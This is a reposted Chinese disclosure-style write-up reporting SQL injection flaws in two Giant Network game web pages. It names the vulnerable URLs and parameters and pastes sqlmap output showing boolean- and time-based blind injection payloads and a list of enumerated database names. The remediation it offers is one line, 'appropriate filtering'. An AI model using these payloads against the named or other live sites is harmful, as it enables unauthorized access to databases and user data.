欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

游戏安全之巨人网络SQL注入集合

程序员文章站 2022-07-01 08:43:51
《征途2》官方网站-巨人扛鼎大作 第一热血国战网游 ——「我们的征途是星辰大海」 0x01 http://bbs.xt.ztgame.com/zb/fsb3.ph...

《征途2》官方网站-巨人扛鼎大作 第一热血国战网游

——「我们的征途是星辰大海」

0x01

http://bbs.xt.ztgame.com/zb/fsb3.php?rt=11&sid=95

参数rt存在注入

[11:19:26] [INFO] resuming back-end DBMS 'mysql'

[11:19:27] [INFO] testing connection to the target URL

[11:19:27] [INFO] heuristics detected web page charset 'GB2312'

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: rt (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: rt=11 AND 9725=9725&sid=95

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: rt=11 AND (SELECT * FROM (SELECT(SLEEP(5)))YelR)&sid=95

---

[11:19:27] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.5.25

back-end DBMS: MySQL 5.0.12

[11:19:27] [INFO] fetching database names

[11:19:27] [INFO] fetching number of databases

[11:19:27] [INFO] resumed: 6

[11:19:27] [INFO] resumed: information_schema

[11:19:27] [INFO] resumed: discuz

[11:19:27] [INFO] resumed: discuz2

[11:19:27] [INFO] resumed: test

[11:19:27] [INFO] resumed: webdb

[11:19:27] [INFO] resumed: wordpress

available databases [6]:

[*] discuz

[*] discuz2

[*] information_schema

[*] test

[*] webdb

[*] wordpress

0x02

http://act.z.ztgame.com/cdkey/do.php?code_1=CaterNoMatch&code_2=CaterNoMatch

参数code_1存在注入

[11:36:22] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'

GET parameter 'code_1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection point(s) with a total of 2328 HTTP(s) requests:

---

Parameter: code_1 (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: code_1=CaterNoMatch' AND (SELECT * FROM (SELECT(SLEEP(5)))NlTb)-- wDrl&code_2=CaterNoMatch

---

[11:36:22] [INFO] the back-end DBMS is MySQL

[11:36:22] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions

web application technology: Apache

back-end DBMS: MySQL 5.0.12

[11:36:22] [INFO] fetching database names

[11:36:22] [INFO] fetching number of databases

解决方案:

适当的过滤

上一篇: iOS 正则表达式~常用符号

下一篇: 除了跑分 骁龙845还能带来这些新变化

推荐阅读